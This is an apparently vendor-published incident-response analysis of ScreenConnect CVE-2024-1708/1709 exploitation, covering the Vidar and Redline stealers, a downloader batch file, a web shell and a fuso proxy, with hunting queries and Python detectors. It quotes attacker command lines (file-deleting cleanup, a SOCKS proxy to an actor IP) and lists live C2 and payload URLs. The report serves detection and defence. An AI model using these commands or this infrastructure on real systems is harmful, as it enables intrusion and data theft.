On 21 February 2024 two vulnerabilities in ConnectWise ScreenConnect were published on NVD. ScreenConnect is remote desktop and remote access software from ConnectWise. The first, CVE-2024-1708[1], is a path-traversal vulnerability rated CVSS 8.4 (High). The second, CVE-2024-1709[2], is an authentication bypass vulnerability rated CVSS 10 (Critical). ConnectWise ScreenConnect versions 23.9.7 and prior are affected by both vulnerabilities[3].
On 21 February 2024 researchers from Huntress released a PoC that chains these two ScreenConnect vulnerabilities to achieve RCE (Remote Code Execution) on a victim machine running a vulnerable ScreenConnect version[4]. Huntress released only a video demonstration of the exploit and did not publish the PoC exploit code. A number of separate PoC exploits have since been published on GitHub by other security researchers[5] [6] [7].
In the same week, FortiGuard MDR and the FortiGuard IR team responded to several incidents related to exploitation of this vulnerability. In some cases, more than one threat actor was observed exploiting the same vulnerable endpoints over this period. This article will outline how FortiEDR was able to effectively detect and respond to all observed post-exploitation activity associated with exploitation of this vulnerability across these various intrusions.
The FortiGuard MDR team detected events in a client environment where a malicious file named ‘ScreenConnectUpdate.exe’ was being executed on multiple hosts from different paths. FortiEDR flagged the execution as malicious because the executable triggered the ‘Suspicious Packer’ and ‘Writable Code’ rules of the ‘Exfiltration Prevention’ security policy, and the execution was blocked. An example of one of these security events is shown in Figure 1 below. It is worth noting that at the time of execution the file did not have a known malicious signature; characteristics of the file and anomalies in the associated process triggered FortiEDR’s behavior-based rules.
Figure 1. FortiEDR blocked execution of malicious 'ScreenConnectUpdate.exe'
Investigation through FortiEDR data confirmed that the file was dropped through exploitation of the ScreenConnect vulnerability. We can observe that this file was created by the ‘ScreenConnect.WindowsClient.exe’ process using FortiEDR Threat Hunting telemetry, as shown in Figure 2 below.
Figure 2. FortiEDR Threat Hunting data showing malicious file 'ScreenConnectUpdate.exe' was created by ScreenConnect software.
When we looked up the hash of this malicious ‘ScreenConnectUpdate.exe’ file in FortiGuard CTS, the file was tagged as the Vidar stealer, as shown in Figure 3 below.
Figure 3. FortiGuard CTS showing malicious file tagged as Vidar Malware.
During further analysis we ran ExifTool on ‘ScreenConnectUpdate.exe’. The language code of the executable was ‘Farsi’, the official language of Iran, Afghanistan and Tajikistan. The ExifTool output is shown in Figure 4 below.
Figure 4. ExifTool output for the malicious file ScreenConnectUpdate.exe
To examine the behavior of this malicious file further, we executed it in a test environment with FortiEDR configured in ‘Log Only’ mode. When executed, the file communicated with two different URLs. One was ‘hxxp[:]//t[.]me/hypergog’, a Telegram messenger profile URL, and the other was ‘hxxps[:]//steamcommunity[.]com/profiles/76561199642171824’, a Steam gaming community profile. These are legitimate services that were used to implement the dead drop resolver technique (T1102.001 – Web Service: Dead Drop Resolver). Both profiles carried information about additional, separate command and control (C2) infrastructure to which the malicious executable would connect. The two profiles are shown in Figures 5 and 6 below.
Figure 5. Telegram messenger profile showing C2 IP and Port information
Figure 6. Steam gaming community profile showing C2 URL
As can be seen in the two images above, both profiles contain the keyword ‘set8b’ in the profile name, followed by a C2 URL. The malicious executable extracted this C2 information from the profile and then connected to the C2 URL taken from the Telegram profile. We suspect the C2 URL in the Steam gaming community profile is a fallback C2. This behavior can be observed in the Threat Hunting data shown in Figure 7.
Figure 7. FortiEDR Threat Hunting data showing Telegram connection and then C2 communication.
The communication with the C2 occurred on a non-standard port (T1571 – Non-Standard Port) and was encrypted using TLSv1.2 (http-over-tls) (T1573 – Encrypted Channel). After establishing initial C2 communication, the executable (ScreenConnectUpdate.exe) downloaded a DLL from the C2 (sqlm[1].dll) and wrote it to C:\Users\<UserName>\AppData\Local\Microsoft\Windows\INetCache\IE\C2CDXEP5\sqlm[1].dll. Once downloaded, the DLL was loaded by the main executable process. The executable then created files whose names consist of random uppercase letters (possibly containing data stolen from the victim host), sent some data to the C2 over the encrypted channel, and then the process terminated.
The malicious file spawned a thread to perform the network communication with the C2 server. This triggered the ‘Dynamic Code’, ‘Suspicious Packer’, ‘Unmapped Executable’ and ‘Writable Code’ rules of the FortiEDR Exfiltration Prevention policy, as shown in Figure 8 below.
Figure 8. Network communication of the Vidar executable (ScreenConnectUpdate.exe) was blocked by FortiEDR
Before the process exited it ran a command to delete ‘ScreenConnectUpdate.exe’ and all DLL files under ‘C:\ProgramData\’. This removes the main Vidar executable and any DLL files previously downloaded to that folder. The command used was as follows:
cmd.exe /c timeout /t 5 & del /f /q "\\<user_Documents>\ConnectWiseControl\Temp\ScreenConnectUpdate.exe" & del "C:\ProgramData\*.dll"" & exit
Identical activity was observed in three separate customer environments, with the customers located in different geographic locations in the USA, indicating that this attack was likely opportunistic and did not specifically target the victim organizations.
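The self-deletion command above is a useful hunting artifact on its own: a ‘timeout /t N’ followed by ‘del’ of the parent’s own image, plus a wildcard ‘del’ of every DLL under ProgramData. The following Python snippet is an added example (not code from the article or from FortiEDR) that scores process command lines for those traits. The sample command lines are constructed for the example; the first is modelled on the command reproduced above.

```python
import re
from typing import Dict, List

# Constructed command lines (not from the article's telemetry). The first is
# modelled on the Vidar self-deletion command; the others are variations and a
# benign control.
SAMPLE_COMMAND_LINES = [
    'cmd.exe /c timeout /t 5 & del /f /q "C:\\Users\\alice\\Documents\\ConnectWiseControl\\Temp\\ScreenConnectUpdate.exe" & del "C:\\ProgramData\\*.dll"" & exit',
    'cmd.exe /c timeout /t 3 & del /f /q "C:\\Users\\bob\\AppData\\Local\\Temp\\setup.exe" & exit',
    'cmd.exe /c del /q "C:\\ProgramData\\*.dll"',
    'cmd.exe /c dir "C:\\Users\\alice"',
]

# Indicator name -> regex, evaluated in this order so results are deterministic.
INDICATORS = [
    # "timeout /t N" immediately chained to "del": a delay so the parent process
    # can exit before its own image is removed.
    ("delayed_self_delete",
     re.compile(r"timeout\s+/t\s+\d+\s*&+\s*del\b", re.I)),
    # Wildcard deletion of every DLL under ProgramData (downloaded modules wiped).
    ("deletes_programdata_dlls",
     re.compile(r'del\s+(?:/[a-z]\s+)*"?[a-z]:\\programdata\\\*\.dll', re.I)),
    # Deletion of an .exe inside the ScreenConnect client temp folder.
    ("deletes_connectwise_temp_exe",
     re.compile(r'del\b[^&]*connectwisecontrol\\temp\\[^"&]*\.exe', re.I)),
]


def assess_command_line(cmdline: str) -> List[str]:
    """Return the names of all indicators present in one command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def scan(cmdlines: List[str]) -> List[Dict]:
    """Evaluate a batch of command lines; any indicator hit marks it suspicious."""
    results = []
    for cmd in cmdlines:
        hits = assess_command_line(cmd)
        results.append({"command_line": cmd, "indicators": hits, "suspicious": bool(hits)})
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_COMMAND_LINES):
        print(r["suspicious"], r["indicators"])
```

The three indicators are independent, so a single ‘timeout & del’ of an installer in a user temp folder scores lower than the full Vidar pattern; treat the first indicator alone as a lead to review rather than a verdict.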
A separate cluster of post-exploitation activity observed within several customer environments was the use of intermediate batch files dropped and executed through exploitation of the vulnerability. In one instance the threat actor dropped a batch file named ‘r.bat’ to the ‘C:\Windows\Temp\ScreenConnect\23.9.10.8817\’ path and attempted to execute it through exploitation of the vulnerable ScreenConnect software. The contents of the .BAT file were retrieved by the FortiGuard IR team and are shown in Figure 9 below.
Figure 9. Content of Malicious r.bat file.
As the code in ‘r.bat’ shows, the file contains four static, hardcoded download URLs. The batch file picks one of the four URLs at random, downloads the payload from it, saves the payload as ‘C:/Windows/temp/1.exe’ and then executes ‘1.exe’.
FortiEDR detected the network communication attempt by bitsadmin.exe, which was executed by ‘r.bat’. This behavior triggered the ‘Suspicious Application’ rule under FortiEDR’s ‘Exfiltration Prevention’ security policy, which blocked the network connection and prevented the intrusion from progressing. The associated security event is shown in Figure 10 below.
Figure 10. Network communication of bitsadmin.exe detected and blocked by FortiEDR.
For analysis we manually downloaded the payload from one of the URLs in the ‘r.bat’ file and analyzed it further. The 1.exe file (SHA1 - cc504e720745db5061e41528a2d36976b20bc0e7) was found to be written in the Rust programming language. When we detonated ‘1.exe’ in a test environment, it created a copy of itself using the path format
{Folder path}\{original filename}.{random 32 lowercase alphabets}.__selfdelete__.exe
Analysis of the ‘1.exe’ executable identified that it performs an anti-debugging check using the IsDebuggerPresent API. If a debugger is detected, the file stops executing. This can be observed in the disassembly shown in Figure 11 below:
Figure 11. Disassembled code of 1.exe showing debugger check function.
The file also checks for the existence of the file ‘C:/windows/temp/0’, which is created by r.bat. This may be an anti-analysis technique that stops execution if ‘r.bat’ was not run before the file. Further analysis of this file is ongoing.
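The self-copy path format described above is regular enough to hunt for in file-create telemetry. The following Python snippet is an added example (not code from the article or from FortiEDR) that parses a path against that format and reports the directory and original filename; the file-create records are constructed for the example, and ‘32 lowercase alphabets’ is taken here to mean 32 ASCII lowercase letters, which is an assumption.

```python
import re
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple

# {original filename}.{32 random lowercase letters}.__selfdelete__.exe
# Assumption: "lowercase alphabets" in the article means ASCII a-z.
SELF_DELETE_COPY = re.compile(
    r"^(?P<original>.+?)\.(?P<token>[a-z]{32})\.__selfdelete__\.exe$"
)


def parse_self_delete_copy(path: str) -> Optional[Tuple[str, str]]:
    """Return (directory, original filename) when the path matches, else None."""
    p = PureWindowsPath(path)
    m = SELF_DELETE_COPY.match(p.name)
    if m is None:
        return None
    return str(p.parent), m.group("original")


# Constructed file-create events (not page data). The third uses an uppercase
# token and must not match; the fourth is a benign control.
SAMPLE_FILE_EVENTS = [
    {"process": "1.exe",
     "path": r"C:\Windows\temp\1.exe.abcdefghijklmnopqrstuvwxyzabcdef.__selfdelete__.exe"},
    {"process": "installer.exe",
     "path": r"C:\Users\Public\installer.exe.zyxwvutsrqponmlkjihgfedcbazyxwvu.__selfdelete__.exe"},
    {"process": "1.exe",
     "path": r"C:\Windows\temp\1.exe.ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEF.__selfdelete__.exe"},
    {"process": "notepad.exe", "path": r"C:\Users\alice\notes.txt"},
]


def find_self_delete_copies(events) -> List[Tuple[str, str, str]]:
    """Return (creating process, directory, original filename) for each hit."""
    hits = []
    for e in events:
        parsed = parse_self_delete_copy(e["path"])
        if parsed is not None:
            hits.append((e["process"], parsed[0], parsed[1]))
    return hits


if __name__ == "__main__":
    for hit in find_self_delete_copies(SAMPLE_FILE_EVENTS):
        print(hit)
```

Matching on the file name alone keeps the check independent of where the binary was staged, which matters here because ‘1.exe’ was written to a Windows temp path but the pattern would look the same from any folder.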
Another cluster of activity involved the ScreenConnect vulnerability being used to drop web shells on the victim host. These web shells were uploaded as extensions of the ScreenConnect web application. One of these web shells was the .ASHX webpage shown below in Figure 12.
Figure 12. Source code of the web shell dropped on ScreenConnect server.
This web shell is a version of the open-source PoC for exploitation of the ScreenConnect vulnerability published on GitHub by the user ‘W01fh4cker’[8]. The web shell is very simple: it executes ‘cmd.exe’ with the ‘/c’ parameter and the command supplied as a plain string in the ‘cmd’ field of the received web request. At the time of the intrusion FortiEDR was not configured to retain Threat Hunting data long enough to capture the associated file create event for this web shell. However, the following Threat Hunting query can be used to detect the creation of similar web shells. Note that this query may produce false positives and should be tuned before being deployed in production.
Type: ("File Create") AND Target.File.Ext: ("ashx") AND Source.Process.Name:("ScreenConnect.Service.exe" OR "ScreenConnect.ClientService.exe")
In one affected customer environment a threat actor was observed downloading and attempting to execute an executable file ‘fuc.exe’ from the ‘C:\users\Public’ directory. The execution attempt used Windows ‘cmd.exe’ with the following command line, spawned directly from the ScreenConnect main process (ScreenConnect.Client.exe):
cmd.exe /c c:\users\public\fuc.exe 165.227.108.117 8443 --socks --socks-udp --socks-username fuc --socks-password fuc
When we analyzed the ‘fuc.exe’ file we found that it is a custom compiled version of the open-source proxy tool ‘fuso’[9], which its author describes as ‘An intranet penetration proxy tool’. The name and GitHub link are printed when the tool is executed in a test environment with the ‘--help’ parameter, as shown in Figure 13 below.
Figure 13. Open-source intranet penetration proxy tool - Fuso
This tool has a heavy Chinese userbase but is not currently attributed to any threat actor. The tool’s feature list includes ‘transmission encryption’, meaning data transferred by the tool is encrypted on the network. When ‘fuc.exe’ is executed, FortiEDR detects it as a malicious file and blocks the execution, as shown in Figure 14 below.
Figure 14. Execution of the malicious proxy tool fuc.exe was blocked by FortiEDR
In a separate intrusion a threat actor dropped and attempted to execute a file ‘qemu-ga.exe’ using an intermediate file with name ‘ScreenConnectUpdate.exe’. We identified this file as a version of Redline stealer. FortiEDR detected this ‘qemu-ga.exe’ as a malicious file and blocked its execution. The security event associated with this detection and block can be observed in figure 15 below.
Figure 15. FortiEDR blocking execution of Redline stealer malware.
The ‘ScreenConnectUpdate.exe’ file discussed in the earlier event is different from the file in this Redline stealer case. The ‘ScreenConnectUpdate.exe’ name appears to have been chosen by multiple threat actors to make the file look like a legitimate ScreenConnect update process. In this event the file is a loader for the Redline stealer malware.
Redline is a popular infostealer that has been employed by various threat actor groups. Link to our existing KB : https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-Redline-Ste...
As described in this article, multiple threat actors are opportunistically exploiting the ScreenConnect vulnerability to gain access to victim networks and launch further attacks. In some cases we have identified infrastructure overlap with intrusions related to exploitation of other recent vulnerabilities, such as the recent Ivanti Connect Secure vulnerabilities. Because FortiEDR detection is behavior-based, it is able to detect the many different types of post-exploitation activity associated with this vulnerability. In the cases we observed, FortiEDR blocked malicious payloads from the Vidar and Redline malware families across the global FortiEDR and FortiGuard MDR customer base.
The article also provides Threat Hunting queries so the FortiEDR environments can be checked pro-actively for the indicators of some of this activity.
The following Threat Hunting query detects File Create events for 'ScreenConnectUpdate.exe' created by the legitimate ScreenConnect executable (ScreenConnect.Client.exe). Note that this filename has been linked to two distinct clusters of post-exploitation activity.
Type: ("File Create") AND Source.Process.Name:("ScreenConnect.WindowsClient.exe" OR "ScreenConnect.Service.exe" OR "ScreenConnect.ClientService.exe") AND Target.File.Name: ("ScreenConnectUpdate.exe")
The following Threat Hunting query detects Process Creation events for the execution of 'ScreenConnectUpdate.exe' from the ScreenConnect software. A file named ‘ScreenConnectUpdate.exe’ does not match any legitimate ScreenConnect component:
Type: ("Process Creation") AND Source.Process.Name:("ScreenConnect.WindowsClient.exe" OR "ScreenConnect.Service.exe" OR "ScreenConnect.ClientService.exe") AND Target.Process.Name:("ScreenConnectUpdate.exe")
The following Threat Hunting query detects Process Creation events where cmd.exe is spawned by the ScreenConnect software. Note that there may be legitimate uses where cmd.exe is executed through ScreenConnect, in which case this query will return false positives:
Type: ("Process Creation") AND Source.Process.Name:("ScreenConnect.WindowsClient.exe" OR "ScreenConnect.Service.exe" OR "ScreenConnect.ClientService.exe") AND Target.Process.Name:("cmd.exe")
The following Threat Hunting query detects File Create events for files with the .ASHX (i.e. web shell) extension dropped by the ScreenConnect software in the path ‘C:\Program Files (x86)\ScreenConnect\App_Extensions\’:
Type: ("File Create") AND Target.File.Ext:("ashx") AND Target.File.Path: ("C\:\\Program Files \(x86\)\\ScreenConnect\\App_Extensions") AND Source.Process.Name:("ScreenConnect.Service.exe" OR "ScreenConnect.ClientService.exe")
The following Threat Hunting query detects ‘HTTP Request’ events for C2 connections by 'ScreenConnectUpdate.exe' to the C2 URLs found in the current campaign.
Type: ("HTTP Request") AND Source.Process.Name:("ScreenConnectUpdate.exe") AND URL: ("http\:\/\/142.132.224.223\:9001" OR "https\:\/\/65.109.172.49")
The following Threat Hunting query detects malicious payload download attempts from the URLs hardcoded in ‘r.bat’:
Type: ("HTTP Request") AND URL:("http\:\/\/shapefiles.fews.net.s3.amazonaws.com\:80\/8gaLYHLcZ4DPV" OR "http\:\/\/brandnav-cms-storage.s3.amazonaws.com\:80\/VBtGzOcze428R" OR "http\:\/\/banglarchokhprotidin.s3-ap-southeast-1.amazonaws.com\/ZnhOgW4OnnPIH" OR "http\:\/\/mapimages.fews.net.s3.amazonaws.com\:80\/Joqyh6eNHht7n")
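For environments that export FortiEDR telemetry to another tool, or for analysts who want to sanity-check the queries against known-good and known-bad records, the following Python snippet is an added example (not code from the article or from FortiEDR) that re-implements the Threat Hunting queries above as predicates over event dictionaries. The field names are those used in the queries; the comparisons are case-insensitive and the URL terms are treated as prefixes, both of which are assumptions about query semantics rather than documented FortiEDR behavior. The event records are constructed for the example.

```python
from typing import Callable, Dict, List

# Process names and values taken from the queries in this article (lowercased
# here because matching below is case-insensitive, an assumption).
SC_PROCS = {"screenconnect.windowsclient.exe", "screenconnect.service.exe",
            "screenconnect.clientservice.exe"}
SC_SERVICES = {"screenconnect.service.exe", "screenconnect.clientservice.exe"}
APP_EXT_PATH = r"c:\program files (x86)\screenconnect\app_extensions"
VIDAR_C2_URLS = ("http://142.132.224.223:9001", "https://65.109.172.49")
PAYLOAD_URLS = (
    "http://shapefiles.fews.net.s3.amazonaws.com:80/8gaLYHLcZ4DPV",
    "http://brandnav-cms-storage.s3.amazonaws.com:80/VBtGzOcze428R",
    "http://banglarchokhprotidin.s3-ap-southeast-1.amazonaws.com/ZnhOgW4OnnPIH",
    "http://mapimages.fews.net.s3.amazonaws.com:80/Joqyh6eNHht7n",
)


def f(e: dict, field: str) -> str:
    """Fetch a field as a lowercase string; missing fields compare as empty."""
    return str(e.get(field, "")).lower()


def url_matches(e: dict, urls) -> bool:
    # Prefix match so a trailing path or slash on the observed URL still hits.
    return any(f(e, "URL").startswith(u.lower()) for u in urls)


def fake_update_file_create(e):   # File Create of ScreenConnectUpdate.exe
    return (f(e, "Type") == "file create" and f(e, "Source.Process.Name") in SC_PROCS
            and f(e, "Target.File.Name") == "screenconnectupdate.exe")

def fake_update_process(e):       # Process Creation of ScreenConnectUpdate.exe
    return (f(e, "Type") == "process creation" and f(e, "Source.Process.Name") in SC_PROCS
            and f(e, "Target.Process.Name") == "screenconnectupdate.exe")

def cmd_from_screenconnect(e):    # cmd.exe spawned by ScreenConnect (noisy)
    return (f(e, "Type") == "process creation" and f(e, "Source.Process.Name") in SC_PROCS
            and f(e, "Target.Process.Name") == "cmd.exe")

def ashx_from_screenconnect(e):   # any .ashx written by the ScreenConnect services
    return (f(e, "Type") == "file create" and f(e, "Target.File.Ext") == "ashx"
            and f(e, "Source.Process.Name") in SC_SERVICES)

def ashx_in_app_extensions(e):    # same, restricted to the App_Extensions folder
    return ashx_from_screenconnect(e) and f(e, "Target.File.Path").startswith(APP_EXT_PATH)

def vidar_c2_request(e):          # HTTP Request from the fake updater to Vidar C2
    return (f(e, "Type") == "http request"
            and f(e, "Source.Process.Name") == "screenconnectupdate.exe"
            and url_matches(e, VIDAR_C2_URLS))

def payload_download(e):          # HTTP Request to one of the r.bat payload URLs
    return f(e, "Type") == "http request" and url_matches(e, PAYLOAD_URLS)


RULES: Dict[str, Callable[[dict], bool]] = {
    "fake_update_file_create": fake_update_file_create,
    "fake_update_process": fake_update_process,
    "cmd_from_screenconnect": cmd_from_screenconnect,
    "ashx_from_screenconnect": ashx_from_screenconnect,
    "ashx_in_app_extensions": ashx_in_app_extensions,
    "vidar_c2_request": vidar_c2_request,
    "payload_download": payload_download,
}


def hunt(events: List[dict]) -> Dict[str, List[int]]:
    """Map each rule name to the indices of the events it matches."""
    hits = {name: [] for name in RULES}
    for i, e in enumerate(events):
        for name, rule in RULES.items():
            if rule(e):
                hits[name].append(i)
    return hits


# Constructed events (not page telemetry); the last one is a benign control.
SAMPLE_EVENTS = [
    {"Type": "File Create", "Source.Process.Name": "ScreenConnect.WindowsClient.exe",
     "Target.File.Name": "ScreenConnectUpdate.exe",
     "Target.File.Path": r"C:\Users\alice\Documents\ConnectWiseControl\Temp"},
    {"Type": "Process Creation", "Source.Process.Name": "ScreenConnect.WindowsClient.exe",
     "Target.Process.Name": "ScreenConnectUpdate.exe"},
    {"Type": "Process Creation", "Source.Process.Name": "ScreenConnect.Service.exe",
     "Target.Process.Name": "cmd.exe"},
    {"Type": "File Create", "Source.Process.Name": "ScreenConnect.Service.exe",
     "Target.File.Ext": "ashx",
     "Target.File.Path": r"C:\Program Files (x86)\ScreenConnect\App_Extensions\a1b2\cmd.ashx"},
    {"Type": "File Create", "Source.Process.Name": "ScreenConnect.ClientService.exe",
     "Target.File.Ext": "ashx", "Target.File.Path": r"C:\inetpub\wwwroot\x.ashx"},
    {"Type": "HTTP Request", "Source.Process.Name": "ScreenConnectUpdate.exe",
     "URL": "http://142.132.224.223:9001/"},
    {"Type": "HTTP Request", "Source.Process.Name": "bitsadmin.exe",
     "URL": "http://brandnav-cms-storage.s3.amazonaws.com:80/VBtGzOcze428R"},
    {"Type": "Process Creation", "Source.Process.Name": "explorer.exe",
     "Target.Process.Name": "cmd.exe"},
]

if __name__ == "__main__":
    for name, idx in hunt(SAMPLE_EVENTS).items():
        print(f"{name}: {idx}")
```

The fourth and fifth sample events illustrate the difference between the two .ASHX queries: the broad query flags any .ASHX written by the ScreenConnect services, while the path-restricted query only flags writes into App_Extensions, which is where the observed web shell was installed.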
Note: The indicators in observed activity for each MITRE technique are relevant to analyzed campaigns and may change in future campaigns.
TA0001 – Initial Access
Technique ID | Technique Description | Observed Activity
T1190 | Exploit Public-Facing Application | The public-facing ScreenConnect application is exploited by the threat actors.
TA0002 - Execution
Technique ID | Technique Description | Observed Activity
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | The web shell dropped by the threat actor uses cmd.exe to execute the received commands.
TA0003 - Persistence
Technique ID | Technique Description | Observed Activity
T1505.003 | Server Software Component: Web Shell | A web shell with the .ASHX extension was dropped by the threat actor.
TA0005 - Defense Evasion
Technique ID | Technique Description | Observed Activity
T1070 | Indicator Removal: File Deletion | The r.bat file used by the threat actor deleted ‘ScreenConnectUpdate.exe’ and ‘C:\ProgramData\*.dll’.
T1622 | Debugger Evasion | The malicious file ‘1.exe’ checks for the presence of a debugger using the IsDebuggerPresent API.
TA0011 - Command and Control
Technique ID | Technique Description | Observed Activity
T1102.001 | Web Service: Dead Drop Resolver | The threat actor that dropped the Vidar malware used Telegram and Steam profiles to point to additional C2 infrastructure.
T1571 | Non-Standard Port | The Vidar executable communicated with the C2 IP on non-standard port 9001.
T1573 | Encrypted Channel | The Vidar executable communicated with the C2 over an encrypted channel (http-over-tls).
T1008 | Fallback Channels | The Vidar executable had a fallback C2 stored in the Steam profile, which was not used because the C2 IP obtained from the Telegram profile was reachable.
T1105 | Ingress Tool Transfer | The Vidar executable downloaded the DLL file sqlm[1].dll.
T1095 | Non-Application Layer Protocol | The proxy tool fuc.exe used by the threat actor communicated over UDP.
T1090 | Proxy | The proxy tool Fuso (fuc.exe) was used by the threat actor to attempt a reverse proxy connection to an actor-controlled IP address.
Indicator Description | Indicator | Indicator Type | Associated Tactic | Notes | First Observed
Malicious Executable | 013f5aa9057bf0b3c0c24824de9d075434501354 | SHA1 Hash | Installation | qemu-ga.exe (Redline stealer) | 2023-12-23
Malicious Executable | 9b860be98a046ea97a7f67b006e0b1bc9ab7731dd2a0f3a9fd3d710f6c43278a | SHA256 Hash | Installation | qemu-ga.exe (Redline stealer) | 2023-12-23
Malicious Executable | cc504e720745db5061e41528a2d36976b20bc0e7 | SHA1 Hash | Installation | VBtGzOcze428R (1.exe) unconfirmed malicious executable | 2024-02-22
Malicious Executable | 0c2c8280701706e0772cb9be83502096e94ad4d9c21d576db0bc627e1e84b579 | SHA256 Hash | Installation | VBtGzOcze428R (1.exe) unconfirmed malicious executable | 2024-02-22
Malicious Executable | 50daf81662e54fa1dc73abb280145b6ee99fd87c | SHA1 Hash | Installation | ScreenConnectUpdate.exe (Vidar stealer) | 2024-02-22
Malicious Executable | ab99cab6e179978e4c46e1ac17ba613be0f507224e0258fb2ec9ddb93e6f10e4 | SHA256 Hash | Installation | ScreenConnectUpdate.exe (Vidar stealer) | 2024-02-22
Malicious URL | hxxp[:]//142.132.224[.]223:9001 | URL | Installation | Vidar C2 URL | 2024-02-25
Malicious URL | hxxps[:]//65.109.172[.]49 | URL | Installation | Vidar C2 URL | 2024-02-25
Malicious Executable | be33f41f7d58bb28ad5c0535bab6c9dd5deb7da2 | SHA1 Hash | Installation | ScreenConnectUpdate.exe (Redline loader) | 2024-02-22
Malicious Executable | d89ddcd894bff46b4217e0717f80d530e2bb912a5b4518478077f9963903a5f0 | SHA256 Hash | Installation | ScreenConnectUpdate.exe (Redline loader) | 2024-02-22
[1] https://nvd.nist.gov/vuln/detail/CVE-2024-1708
[2] https://nvd.nist.gov/vuln/detail/CVE-2024-1709
[3] https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
[4] https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authenticati...
[5] https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
[6] https://github.com/HussainFathy/CVE-2024-1709/blob/main/CVE-2024-1709.py
[7] https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
[8] https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE/blob/main/ScreenConnect-AuthBypass-RCE.py
[9] https://github.com/editso/fuso
Copyright 2024 Fortinet, Inc. All Rights Reserved.